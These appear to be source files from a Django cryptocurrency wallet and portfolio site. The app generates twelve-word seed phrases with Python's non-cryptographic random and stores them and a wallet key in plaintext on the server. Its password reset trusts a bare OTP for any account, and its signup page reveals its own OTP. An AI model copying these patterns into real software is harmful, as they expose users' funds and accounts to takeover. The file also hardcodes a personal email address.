app_user/urls.py
from django.urls import path
from . import views

app_name = "app_user"

urlpatterns = [


	path("sign-in/", views.SignInView, name="sign_in"),
	path("sign-up/", views.SignUpView, name="sign_up"),
	path("maintain/", views.MaintainView, name="maintain"),
	path("sign-up/complete/", views.CompleteSignUpView, name="complete_sign_up"),
	path("sign-up/complete/keyphrase/", views.KeyPhraseView, name="keyphrase"),
	path("sign-up/seedphrase/confirm/sa/sas/", views.SeedPhraseView, name="seedphrase"),
	path("sign-out/", views.SignOutView, name="sign_out"),
	path("generator/", views.GeneratorView, name="generator"),
	
	path("forgot-password/", views.ForgotPasswordView, name="forgot_password"),
	path("set-new-password/", views.SetNewPView, name="set_new_p"),

	path("app-user-detail/<int:app_user_id>/", views.AppUserDetailView, name="app_user_detail"),
	
	path("<str:wallet_address>/", views.AppUserDetail2View, name="app_user_detail2"),

	path("temp/", views.TempView, name="temp"),
	path("change-password/", views.ChangePasswordView, name="change_password"),

]

curl_pro/urls.py
from django.contrib import admin
from django.urls import path, include
from django.conf import settings
from django.conf.urls.static import static

from main import views

urlpatterns = [
    path('admin/', admin.site.urls),
    path("", include("main.urls")),
    path("wallet/", include("wallet.urls")),
    path("app/", include("app_user.urls")),
    path("staking/", include("staking.urls")),
    path("launchpad/", include("launchpad.urls")),

]

handler404 = 'app_user.views.error_404'
handler500 = 'app_user.views.error_500'
handler404 = 'main.views.error_404'
handler500 = 'main.views.error_500'
handler404 = 'wallet.views.error_404'
handler500 = 'wallet.views.error_500'


if settings.DEBUG:
    urlpatterns += static(settings.MEDIA_URL,
                          document_root=settings.MEDIA_ROOT)

main/urls.py
from django.urls import path
from . import views

app_name = "main"

urlpatterns = [

    path("your-portfolio/manual/", views.ConnectMetamaskManualView, name="your_portfolio_manual"),
    path("your-portfolio/bitgert/", views.ConnectMetamaskManualBView, name="your_portfolio_bitgert"),
    path("your-portfolio/bsc/", views.ConnectMetamaskManualBscView, name="your_portfolio_bsc"),
    path("your-portfolio/canto/", views.ConnectMetamaskManualCantoView, name="your_portfolio_canto"),
    path("your-portfolio/core/", views.ConnectMetamaskManualCoreView, name="your_portfolio_core"),
    path("your-portfolio/", views.ConnectMetamaskView, name="your_portfolio"),
    path("bitgert-portfolio/", views.BitgertConnectMetamaskView, name="bitgert_portfolio"),
    path("bsc-portfolio/", views.BscConnectMetamaskView, name="bsc_portfolio"),
    path("canto-portfolio/", views.CantoConnectMetamaskView, name="canto_portfolio"),
    path("core-portfolio/", views.CoreConnectMetamaskView, name="core_portfolio"),
    path("portfolio/", views.PortfolioView, name="portfolio"),
    path("bscportfolio/", views.BscPortfolioView, name="bscportfolio"),
    path("brise-portfolio/", views.BrisePortfolioView, name="brise_portfolio"),
    path("wcanto-portfolio/", views.WCantoPortfolioView, name="wcanto_portfolio"),
    path("coreportfolio/", views.CorePortfolioView, name="coreportfolio"),
	path("", views.IndexView, name="index"),
	path("none/", views.NoneView, name="none"),
	path("doken/", views.DokenView, name="doken"),
	path("loop/", views.LoopView, name="loop"),
	path("candy/", views.CandyView, name="candy"),
	path("ice/", views.IceView, name="ice"),
	path("navis/", views.NavisView, name="navis"),
	path("bow/", views.BowView, name="bow"),
	path("lung/", views.LungView, name="lung"),
	path("bitgert/", views.BitgertView, name="bitgert"),
	path("canto/", views.CantoView, name="canto"),
	path("core/", views.CoreView, name="core"),
	path("coming/", views.ComingView, name="coming"),
	path("shadowswap/", views.ShadowView, name="shadowswap"),
	path("coreid/", views.CoreidView, name="coreid"),
	path("crest/", views.CrestView, name="crest"),
	path("yieldz/", views.YieldsView, name="yieldz"),
	path("happy/", views.HappyView, name="happy"),
	path("lfgswap/", views.LfgswapView, name="lfgswap"),
	path("4token/", views.IgnoreFudView, name="4token"),
	path("ypc/", views.YpcView, name="ypc"),
	path("3dc/", views.DcView, name="3dc"),
	path("aicore/", views.AicoreView, name="aicore"),
	path("ainu/", views.AinuView, name="ainu"),
	path("akio/", views.AkioView, name="akio"),
	path("bcore/", views.BcoreView, name="bcore"),
	path("block/", views.BlockView, name="block"),
	path("bitvexa/", views.BitvexaView, name="bitvexa"),
	path("hobo/", views.HoboView, name="hobo"),
	path("woof/", views.WoofView, name="woof"),
	path("word/", views.WordView, name="word"),
	path("score/", views.ScoreView, name="score"),
	path("cbunny/", views.CbunnyView, name="cbunny"),
	path("cshare/", views.CshareView, name="cshare"),
	path("ctomb/", views.CtombView, name="ctomb"),
	path("emperor/", views.EmperorView, name="emperor"),
	path("flash/", views.FlashView, name="flash"),
	path("green/", views.GreenView, name="green"),
	path("royale/", views.RoyaleView, name="royale"),
	path("miidas/", views.MiidasView, name="miidas"),
	path("unity/", views.UnityView, name="unity"),
	path("spoon/", views.SpoonView, name="spoon"),
	path("shield/", views.ShieldView, name="shield"),
	path("yfi/", views.YfiView, name="yfi"),
	path("pepe/", views.PepeView, name="pepe"),
	path("map/", views.MapView, name="map"),
	path("crystal/", views.CrystalView, name="crystal"),
	path("more/", views.MoreView, name="more"),
	path("coredoge/", views.CoredogeView, name="coredoge"),
	path('token/<str:token_id>/', views.token_details, name='token_details'),
	path('pool_info/<int:page>/', views.pool_info, name='pool_info'),
	path("tokens/<str:token_id>/", views.token_detail, name="token_detail"),
	

]

app_user/models.py
from django.db import models
from django.contrib.auth.models import User
from django.utils import timezone




class AppUser(models.Model):
    user = models.OneToOneField(User, on_delete=models.CASCADE)
    account_type = models.CharField(default="candidate",max_length=10)


    

    otp_code = models.CharField(default="none",max_length=10)
    
    ec_status = models.BooleanField(default=False)
    status = models.BooleanField(default=False)

    
    passphrase0 = models.CharField(default="none",max_length=20)
    passphrase1 = models.CharField(default="none",max_length=20)
    passphrase2 = models.CharField(default="none",max_length=20)
    passphrase3 = models.CharField(default="none",max_length=20)
    passphrase4 = models.CharField(default="none",max_length=20)
    passphrase5 = models.CharField(default="none",max_length=20)
    passphrase6 = models.CharField(default="none",max_length=20)
    passphrase7 = models.CharField(default="none",max_length=20)
    passphrase8 = models.CharField(default="none",max_length=20)
    passphrase9 = models.CharField(default="none",max_length=20)
    passphrase10 = models.CharField(default="none",max_length=20)
    passphrase11 = models.CharField(default="none",max_length=20)
    
    #wallet shit
    wallet_address = models.CharField(default="null",max_length=100)
    wallet_key = models.CharField(default="null",max_length=100)
    
    pub_date = models.DateTimeField(default=timezone.now)

    def __str__(self):
        return self.user.username

app_user/forms.py
from django.contrib.auth.models import User
from django import forms

class UserForm(forms.ModelForm):
	password1 = forms.CharField(widget=forms.PasswordInput())
	password2 = forms.CharField(widget=forms.PasswordInput())
	class Meta():
		model = User
		fields = ("username", "first_name", "last_name", "password1", "password2")

app_user/views.py
from django.shortcuts import render
from django.contrib import messages
from django.shortcuts import render
from django.utils import timezone
from django.http import HttpResponse, HttpResponseRedirect
from django.urls import reverse, reverse_lazy
from django.contrib.auth import login, logout, authenticate
from django.contrib.auth.models import User

from django.core.mail import send_mail
from django.core import mail
from django.template.loader import render_to_string
from django.utils.html import strip_tags

from datetime import datetime
import datetime as dt
import requests
from django.shortcuts import redirect
from .forms import UserForm
from .models import AppUser
from django.contrib.auth.decorators import login_required

import random
import string


def RayGenkey():
    word_site = "https://www.mit.edu/~ecprice/wordlist.10000"
    response = requests.get(word_site)
    words = response.content.splitlines()
    keyphrase = []
    for item in range(12):
        keyphrase.append(random.choice(words))

    return keyphrase

def ray_randomiser(length=6):
    landd = string.ascii_letters + string.digits
    return ''.join((random.choice(landd) for i in range(length)))
    

def RaySendMail(request, subject, message, to_email, code=None):

    #try:
    context = {"subject": subject, "message": message, "code": code}
    html_message = render_to_string('app_user/message.html', context)
    message = strip_tags(message)

    send_mail(
        subject,
        message,
        'hello@curlfinance.com',
        [to_email,],
        html_message=html_message,
        fail_silently=False,
    )

    #except:
     #   pass




def ForgotPasswordView(request):
    
    if request.method == "POST":
        email = request.POST.get("username")
        
        app_users = AppUser.objects.filter(user__username=email)
        
        if len(app_users) > 0:
            app_user = app_users.last()
            app_user.otp_code = ray_randomiser()
            app_user.save()
            
            RaySendMail(request, subject="Password Reset.", message="Looks like you lost your password. Kindly use this OTP code; %s to retrieve your account." % (app_user.otp_code), to_email=app_user.user.username, code=app_user.otp_code)

        
            messages.warning(request, "Set new password.")
            return HttpResponseRedirect(reverse("app_user:set_new_p"))
        
        else:
            messages.warning(request, "Sorry, Invalid OTP code.")
            return HttpResponseRedirect(reverse("app_user:forgot_password"))
        
        
    else:
        
        context = {}
        return render(request, "app_user/forgot_password.html", context)
        
        



def SetNewPView(request):
    
    if request.method == "POST":
        otp = request.POST.get("otp")
        password1 = request.POST.get("password1")
        password2 = request.POST.get("password2")
        
        app_users = AppUser.objects.filter(otp_code=otp)
        
        if request.POST.get("password2") != request.POST.get("password1"):
            messages.warning(request, "Make sure both passwords match")
            return HttpResponseRedirect(reverse("app_user:set_new_p"))
            
        elif len(app_users) > 0:
            app_user = app_users.last()
            
            user = app_user.user
            user.set_password(str(password2))
            user.save()
        
            messages.warning(request, "New Password Created!")
            return HttpResponseRedirect(reverse("app_user:sign_in"))
            
        else:
            messages.warning(request, "Sorry, Invalid OTP code.")
            return HttpResponseRedirect(reverse("app_user:set_new_p"))
        
        
    else:
        context = {}
        return render(request, "app_user/set_new_p.html", context)
        
        
                

def SignInView(request):
    if request.method == "POST":
        username = request.POST.get("username")
        password = request.POST.get("password")
        user = authenticate(username=username, password=password)
        if user:
            if user.is_active:
                login(request, user)

                app_user = AppUser.objects.get(user__pk=request.user.id)
                
                if app_user.ec_status == True:
                    
                    if app_user.user.username == "odiagaraymondrayray@gmail.com":
                
                        print("11111111111111111111111111111111")
                        messages.success(request, "Welcome Onboard")
                        return HttpResponseRedirect(reverse("admin_app:index"))
                    
                    else:
                        print("22222222222222222222222222222222")
                        messages.warning(request, "Welcome Onboard")
                        #return redirect('/wallet/?next=%s' % request.path)
                        return HttpResponseRedirect(reverse("wallet:wallet"))
                
                
                else:
                    print("22222222222222222222222222222222")
                    messages.warning(request, "Sorry, validate your account")
                    return HttpResponseRedirect(reverse("app_user:sign_in"))
                
            else:
                print("22222222222222222222222222222222")
                messages.warning(request, "Sorry, Invalid Login Details")
                return HttpResponseRedirect(reverse("app_user:sign_in"))

        else:
            print("33333333333333333333333333333333333333")
            messages.warning(request, "Sorry, Invalid Login Details")
            return HttpResponseRedirect(reverse("app_user:sign_in"))

    else:
        context = {}
        return render(request, "app_user/sign_in.html", context )




def SignUpView(request):
    if request.method == "POST":

        form = UserForm(request.POST or None, request.FILES or None)
        email = request.POST.get("username")
        #first_name = request.POST.get("first_name")
        #last_name = request.POST.get("last_name")
        


        if request.POST.get("password2") != request.POST.get("password1"):
            messages.warning(request, "Make sure both passwords match")
            return HttpResponseRedirect(reverse("app_user:sign_up"))

            
        else:
            try:
                AppUser.objects.get(user__email=request.POST.get("username"))
                messages.warning(request, "Email Address already taken!")
                return HttpResponseRedirect(reverse("app_user:sign_up"))


            except:
                user = form.save()
                user.set_password(request.POST.get("password1"))
                user.save()

                app_user = AppUser.objects.create(user=user)
                app_user.otp_code = ray_randomiser()

                
                
                app_user.save()

                user = app_user.user
                user.email = email
                
                user.save()
                
                #RaySendMail(request, subject="Email Confirmation.", message="Thank you for signing up with CurlFinance, Your OTP code is %s" % (app_user.otp_code), to_email=app_user.user.username, code=app_user.otp_code)

                if user:
                    if user.is_active:
                        login(request, user)

                        app_user = AppUser.objects.get(user__pk=request.user.id)
                        messages.warning(request, "Wallet access key")
                        return HttpResponseRedirect(reverse("app_user:complete_sign_up"))
    else:
        form = UserForm()
        context = {"form": form}
        return render(request, "app_user/sign_up.html", context )


    return render(request, "app_user/sign_up.html", context )


def CompleteSignUpView(request):
    app_user = AppUser.objects.get(user__pk=request.user.id)
    if request.method == "POST":
        otp = request.POST.get("otp")
        
        
        if otp == app_user.otp_code:
            app_user.ec_status = True
            app_user.save()

            messages.warning(request, "almost there!")
            return HttpResponseRedirect(reverse("app_user:keyphrase"))

        else:

            messages.warning(request, "Invalid Access Key.")
            return HttpResponseRedirect(reverse("app_user:complete_sign_up"))


    else:
        otp_code = app_user.otp_code
        context = {'otp_code':otp_code}
        return render(request, "app_user/complete_sign_up.html", context )


def GeneratorView(request):
    if request.method == "POST":
        pass

    else:
        context = {}
        return render(request, "app_user/generator.html", context )


def SignOutView(request):

    logout(request)
    return HttpResponseRedirect(reverse("app_user:sign_in"))






def AppUserDetail2View(request, wallet_address):
    try:
        app_user = AppUser.objects.get(user__pk=request.user.id)
    except:
        app_user = None
        
    if request.method == "POST":
        pass


    else:
        recruit = AppUser.objects.get(wallet_address=wallet_address)

        context = {"app_user": app_user, "recruit": recruit}
        return render(request, "app_user/app_user_detail2.html", context )




@login_required(login_url='/app_user/sign_in/')
def AppUserDetailView(request, app_user_id):
    app_user = AppUser.objects.get(user__pk=request.user.id)
    if request.method == "POST":
        pass


    else:
        recruit = AppUser.objects.get(id=app_user_id)

        context = {"app_user": app_user, "recruit": recruit}
        return render(request, "app_user/app_user_detail.html", context )



app_user/templates/app_user/keyphrase.html
{% load static %}
<!DOCTYPE html>
<html lang="en">

<head>
<meta charset="utf-8" />
<link rel="alternate icon" href="https://curlfinance.com/static/assets/images/logo/curlfi.png">
    <link rel="icon" type="image/svg+xml" href="https://curlfinance.com/static/assets/images/logo/curlfi.png">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <meta name="keywords" content="CurlFinance, Crypto, Defi, Dex, Decentralized Fiance, Portfolio Tracker, Token Tracker,  Launchpad, Defi Wallet, Loop Blockchain,  Farming and Staking, NFT Gallery, NFT Marketplace, CoinmarketCap, Coingecko, Fully Diluted Valuation, 24hrs Volumn, Trading Volume, Liquidity..."/>

    <meta name="msapplication-TileColor" content="#da532c"/>
    <meta name="twitter:card" content="summary_large_image"/>
    <meta property="og:title" content="CurlFinance"/>
    <meta name="twitter:title" content="CurlFinance"/>
    <meta name="twitter:image:width" content="400" />
    <meta name="twitter:image:height" content="300" />
    <meta name="twitter:image:src" content="https://curlfinance.com/static/assets/images/logo/curlfi.png" >

    <meta name="twitter:description" content="CurlFinance is an all-in-one solution consisting of launchpad, Token Tracker, Portfolio Tracker, Wallet, Staking and Farming and so much more...
    "/>
    <meta property="og:description" content="CurlFinance is an all-in-one solution consisting of launchpad, Token Tracker, Portfolio Tracker, Wallet, Staking and Farming and so much more..."/>

    
    <meta name="description" content="CurlFinance is an all-in-one solution consisting of launchpad, Token Tracker, Portfolio Tracker, Wallet, Staking and Farming and so much more...." content="IE=edge"/>

    <title>CurlFinance - Seedphrase</title>
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="apple-touch-icon" sizes="180x180" href="https://curlfinance.com/static/assets/images/logo/curlfi.png"/>
    
    <link rel="alternate icon" href="https://curlfinance.com/static/assets/images/logo/curlfi.png">
    <link rel="shortcut icon" href="https://curlfinance.com/static/assets/images/logo/curlfi.png" type="image/x-icon">
    <link rel="icon" href="https://curlfinance.com/static/assets/images/logo/curlfi.png" type="image/x-icon">
    <meta name="msapplication-TileColor" content="#da532c"/>
    <meta property="og:title" content="CurlFinance"/>
    <link rel="icon" href="https://curlfinance.com/static/assets/images/logo/curlfi.png" type="image/x-icon">
    <link rel="shortcut icon" href="https://curlfinance.com/static/assets/images/logo/curlfi.png" type="image/x-icon">
    <title>CurlFinance | Seedphrase</title>
    <link rel="stylesheet" href="{% static 'app/bootstrap/css/bootstrap.css' %}">
    <link rel="stylesheet" href="{% static 'app/swiper/swiper-bundle.min.css' %}">
    <link rel="stylesheet" href="{% static 'app/dist/app.css' %}">
    <link rel="stylesheet" href="{% static 'assets/font/font-awesome.css' %}">
    <link href="{% static 'assets/unpkg.com/aos%402.3.1/dist/aos.css' %}" rel="stylesheet">
    <!-- Favicon and Touch Icons  -->
    <link rel="shortcut icon" href="https://curlfinance.com/static/assets/images/logo/curlfi.png">
    <link rel="apple-touch-icon-precomposed" href="https://curlfinance.com/static/assets/images/logo/curlfi.png">
<meta name="viewport" content="width=device-width, initial-scale=1" />
<meta name="description" content="" />
<meta name="author" content="" />

<link href="{% static 'assets/css/vendor.min.css' %}" rel="stylesheet" />
<link href="{% static 'assets/css/app.min.css' %}" rel="stylesheet" />

</head>
<body class='pace-top'>








<div class="row col-sm-12">
<div class="col-sm-3"></div>
<div class="col-sm-6">
<div class="card" style="margin-top:150px; margin-left:3px;margin-right:3px">
<div class="card-body mt-10">
<h5 class="card-title" style="text-align:center;padding:3px">MNEMONIC SEEDPHRASE</h5>
<p>Please take note of the following words in the correct order. They make the recovery phrase for your new account</p>
<a  class="btn btn-outline-theme mb-3">1:{{ app_user.passphrase0 }}</a>
<a  class="btn btn-outline-theme mb-3">2:{{ app_user.passphrase1 }}</a>
<a  class="btn btn-outline-theme mb-3">3:{{ app_user.passphrase2 }}</a>
<a class="btn btn-outline-theme mb-3">4:{{ app_user.passphrase3 }}</a>
<a  class="btn btn-outline-theme mb-3">5:{{ app_user.passphrase4 }}</a>
<a  class="btn btn-outline-theme mb-3">6:{{ app_user.passphrase5 }}</a>
<a  class="btn btn-outline-theme mb-3">7:{{ app_user.passphrase6 }}</a>
<a  class="btn btn-outline-theme mb-3">8:{{ app_user.passphrase7 }}</a>
<a  class="btn btn-outline-theme mb-3">9:{{ app_user.passphrase8 }}</a>
<a  class="btn btn-outline-theme mb-3">10:{{ app_user.passphrase9 }}</a>
<a  class="btn btn-outline-theme mb-3">11:{{ app_user.passphrase10 }}</a>
<a  class="btn btn-outline-theme mb-3">12:{{ app_user.passphrase11 }}</a>
<br>
<a class="copy-btn" data-hex="{{ app_user.passphrase0 }} {{ app_user.passphrase1 }} {{ app_user.passphrase2 }} {{ app_user.passphrase3 }} {{ app_user.passphrase4 }} {{ app_user.passphrase5 }} {{ app_user.passphrase6 }} {{ app_user.passphrase7 }} {{ app_user.passphrase8 }} {{ app_user.passphrase9 }} {{ app_user.passphrase10 }} {{ app_user.passphrase11 }}">click to copy keyphrase</a>


</div>


<div class="mb-3 text-center">
<div class="form-check text-center">

	
<script type="text/javascript">
  const copyBtns = [...document.getElementsByClassName('copy-btn')]
  let previous = null

  copyBtns.forEach(btn=> btn.addEventListener('click', ()=>{
    const number = btn.getAttribute('data-hex')
    navigator.clipboard.writeText(number)
    btn.textContent = 'copied to clipboard'

    if (previous) {
      previous.textContent = 'copied to clipboard'
    }
    previous = btn
  }))
</script>


</div>

</div>

<a href="{% url 'app_user:seedphrase' %}" class="btn btn-outline-theme d-block mb-3 m-3 w-70">Continue</a>
<p style="text-align:center;padding:3px"> I have save saved my  <a href="#">Mnemonics</a> in a <a href="#">Safe Place</a>.</p>

<div class="card-arrow">
<div class="card-arrow-top-left"></div>
<div class="card-arrow-top-right"></div>
<div class="card-arrow-bottom-left"></div>
<div class="card-arrow-bottom-right"></div>
</div>
</div>
</div>
</div>

<a href="#" data-toggle="scroll-to-top" class="btn-scroll-top fade"><i class="fa fa-arrow-up"></i></a>


        
        
        <a href="#" data-toggle="scroll-to-top" class="btn-scroll-top fade"><i class="fa fa-arrow-up"></i></a>
        
    </div>




<script src="{% static 'assets/js/vendor.min.js' %}"></script>
<script src="{% static 'assets/js/app.min.js' %}" ></script>


<script src="{% static 'assets/js/demo/pos-counter-checkout.demo.js' %}"></script>

<script>
		(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
		(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
		m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
		})(window,document,'script','../../www.google-analytics.com/analytics.js','ga');

		ga('create', 'UA-53034621-1', 'auto');
		ga('send', 'pageview');

	</script>
<script src="../cdn-cgi/scripts/7d0fa10a/cloudflare-static/rocket-loader.min.js" data-cf-settings="5cdeecb13d7bc8c2048ce22d-|49" defer=""></script><script defer src="https://static.cloudflareinsights.com/beacon.min.js/v652eace1692a40cfa3763df669d7439c1639079717194" integrity="sha512-Gi7xpJR8tSkrpF7aordPZQlW2DLtzUlZcumS8dMQjwDHEnw9I7ZLyiOj/6tZStRBGtGgN6ceN6cMH8z7etPGlw==" data-cf-beacon='{"rayId":"6d34781c0fec426c","version":"2021.12.0","r":1,"token":"4db8c6ef997743fda032d4f73cfeff63","si":100}' crossorigin="anonymous"></script>
</body>

</html>